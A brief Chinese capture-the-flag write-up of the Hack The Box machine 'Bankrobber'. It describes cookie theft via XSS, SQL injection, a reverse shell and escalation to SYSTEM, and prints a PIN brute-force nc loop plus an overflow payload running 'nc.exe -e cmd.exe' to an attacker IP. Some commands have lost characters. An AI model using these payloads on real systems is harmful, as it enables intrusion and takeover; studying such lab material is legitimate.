Hackthebox——Bankrobber

nmap掃描到80、443、445、3306

web上可註冊賬號,註冊後登陸,看到一個TransferE-coin的功能。

隨便填了一點信息發送,提示管理員會看這個請求。

抓到這個請求,看到cookie這裡是用戶名和密碼的base64加密,想到通過xss獲得管理員的cookie來得到管理員的用戶名密碼。

構造payload後發包,成功獲得管理員cookie,解密後獲得管理員密碼,成功登陸管理員賬號。

登陸管理員賬號後,第一個看到note.txt,告訴我們網站的路徑。

頁面最下面有個backdoorchecker,試試執行命令,提示我們只能在localhost執行。

頁面中間有個搜索user的功能,測試後發現存在sql注入。

注入查看到backdoorchecker.php的源碼。從源碼內容中可知要執行命令只能從本地發送請求,前三個字符必須是dir。

結合之前那個xss的漏洞,構造一個反彈shell的payload,發送後成功反彈sehll,獲得user.txt。

嘗試了幾個提權方法都沒成功,後來在C盤根目錄下看到一個可疑的程序,並且這個程序正在運行

轉發端口到本地,nc連接本地910端口,提示需要4位的PIN碼

forn in {0..9}{0..9}{0..9}{0..9};do echo $n;echo $n | nc -nv 127.0.0.1910; done

爆破得到PIN碼,連接後測試發現輸入e-coins存在溢出

利用溢出成功獲得system權限,獲得root.txt。

12345678901234567890123456789012C:UsersCortinnc.exe-e cmd.exe 10.10.14.149 4447

VirMach 便宜 VPS

QNews

QNews